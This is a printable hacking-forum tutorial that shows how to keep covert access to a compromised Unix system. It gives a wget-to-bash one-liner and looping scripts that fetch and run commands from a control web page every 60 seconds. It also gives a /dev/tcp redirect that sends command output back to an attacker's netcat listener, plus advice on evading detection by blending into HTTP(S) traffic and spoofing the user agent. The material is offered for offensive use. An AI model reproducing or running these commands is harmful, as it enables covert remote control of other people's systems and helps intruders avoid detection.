![]() |
|
Tutorial Using Wget To Maintain Access To A System - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: Tutorial Using Wget To Maintain Access To A System (/Thread-Tutorial-Using-Wget-To-Maintain-Access-To-A-System) |
Using Wget To Maintain Access To A System - ncat - 05-13-2019 Heads up, this is a repost of something I wrote elsewhere (I've wrote this thing about three times already, cut me some slack). So it's technically plagiarism. So I'll give credit to myself. The original author is misfit (another alias) I can't link to it because it's on another forum. This is a little trick I picked up recently. Can't remember where I got it, but I'm going to show you how it works. Below is the bash command using wget. For those who don't know, wget is a file download utility preinstalled on most Unix-like systems. Code: wget -q -O - http://example.com | bashSo that's all well and great. But it only allows one command to be executed at a time. Let's make a little bash script. Code: for i in {1..9999}
do
wget -q -O - http://example.com | bash
sleep 60
doneSave as a bash script (something.sh) and then execute it on target. It basically just executes whatever is on the control web page every 60 seconds. We can shorten this to a one liner if you would rather not write the script to the target disk. Code: for i in {1..9999}; do wget -q -O - http://example.com | bash; sleep 60; doneYou can't really see any of the output of your commands. The solution is to redirect output back to your machine. You'll need to have a netcat listener running to get the output: Code: wget -q -O - http://127.0.0.1:8080/cmd | bash &> /dev/tcp/127.0.0.1/31337This is better than your average TCP reverse shell. The reasons being, 1: HTTP(S) is less suspicious on a network than straight up TCP. And yes, if your site runs HTTPS then the shell communications will also be encrypted. Reason 2: The connection only remains open as long as wget tries to connect back, which isn't long. The "sleep" time is obviously up to you, so it can connect back more or less often. So if you run netstat, you may or may not actually see it. If you do happen to catch it, it looks like a HTTP(S) connection. Under closer scrutiny on the network side, this shell will have a wget user agent. Just add your own with the wget -U flag. That's all for today boys and girls. Hope you enjoyed and thanks for reading. - ghost_eyes https://github.com/ghostwalkr |